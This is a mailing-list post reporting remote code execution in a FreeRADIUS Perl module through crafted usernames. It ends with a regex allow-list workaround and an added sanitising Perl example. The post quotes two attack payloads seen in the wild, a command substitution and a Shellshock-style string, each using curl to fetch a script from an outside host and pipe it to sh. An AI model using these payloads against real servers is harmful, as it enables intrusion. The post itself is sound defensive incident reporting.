Remote code execution vulnerability via Perl module

David Herselman dhe at syrex.co
Tue Jul 3 13:44:07 CEST 2018


Hi,

We had upgraded our infrastructure to FreeRADIUS 2.2.10 due to us receiving a growing number of authentication requests, starting Fri Jun 29 00:48:59 (GMT), which result in FreeRADIUS downloading and executing code.

Transmitting the following username results in a custom perl module executing the code:
	$(/usr/bin/curl v.kernelupgr.com/d/all|sh)

We have observed another variant of this, which didn't appear to affect us:
	() { :;}; /usr/bin/curl v.kernelupgr.com/d/all|sh
We've been able to work around the problem by placing the following code near the beginning of our Perl module:
	if ($RAD_REQUEST{'User-Name'} !~ /^[[:alnum:]._-]+$/) { return RLM_MODULE_NOTFOUND; };


Any suggestions regarding possibly cleaning other attributes which may result in code execution on the following line?
	&radiusd::radlog(1, "RAD_REQUEST: $_ = $RAD_REQUEST{$_}");
Testing:
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u-s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
OK
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\\s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\(s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD


Regards
David Herselman
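As an added stand-alone illustration (not the poster's module), the User-Name allow-list from the workaround above combined with a sanitiser that escapes every other attribute before it reaches radlog; the radlog stand-in, the return-code values and the two sample requests are assumptions so the script runs outside FreeRADIUS.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# rlm_perl exposes the request as %RAD_REQUEST; declared here so the script runs stand-alone.
our %RAD_REQUEST;

# Return codes with the values rlm_perl's example.pl assigns them (only two are needed here).
use constant RLM_MODULE_OK       => 2;
use constant RLM_MODULE_NOTFOUND => 6;

# Allow-list for User-Name: the same pattern as the workaround in the post.
my $USERNAME_RE = qr/^[[:alnum:]._-]+$/;

# Reduce any attribute value to something safe to write to a log line:
# printable ASCII is kept, shell/interpolation metacharacters and every
# non-printable byte (newlines included) are rewritten as \xNN escapes.
sub log_safe {
    my ($value) = @_;
    return '(undef)' unless defined $value;
    (my $out = $value) =~ s/([^\x20-\x7e]|[\$`\\"'|;&<>()])/sprintf('\\x%02x', ord $1)/ge;
    return $out;
}

# Stand-in for &radiusd::radlog so the example runs outside FreeRADIUS (assumption).
sub radlog { my ($level, $msg) = @_; print "[$level] $msg\n"; }

sub authorize {
    my $user = $RAD_REQUEST{'User-Name'};
    # Reject before any other attribute is touched, as the post's workaround does.
    if (!defined $user || $user !~ $USERNAME_RE) {
        radlog(1, 'RAD_REQUEST: rejected User-Name ' . log_safe($user));
        return RLM_MODULE_NOTFOUND;
    }
    # Log every attribute through the sanitiser instead of interpolating it raw.
    for my $attr (sort keys %RAD_REQUEST) {
        radlog(1, "RAD_REQUEST: $attr = " . log_safe($RAD_REQUEST{$attr}));
    }
    return RLM_MODULE_OK;
}

# Constructed sample requests: a clean User-Name with a metacharacter-laden
# Calling-Station-Id, then a User-Name that fails the allow-list.
for my $req ({ 'User-Name' => 'u-s_e.r', 'Calling-Station-Id' => "00-11-22\n\$(true)" },
             { 'User-Name' => '$(true)' }) {
    %RAD_REQUEST = %$req;
    print 'result: ', authorize(), "\n";
}
```

The first request is logged with the newline and `$(`, `)` rendered as `\x0a`, `\x24`, `\x28`, `\x29`, the second is returned as RLM_MODULE_NOTFOUND before any attribute is logged.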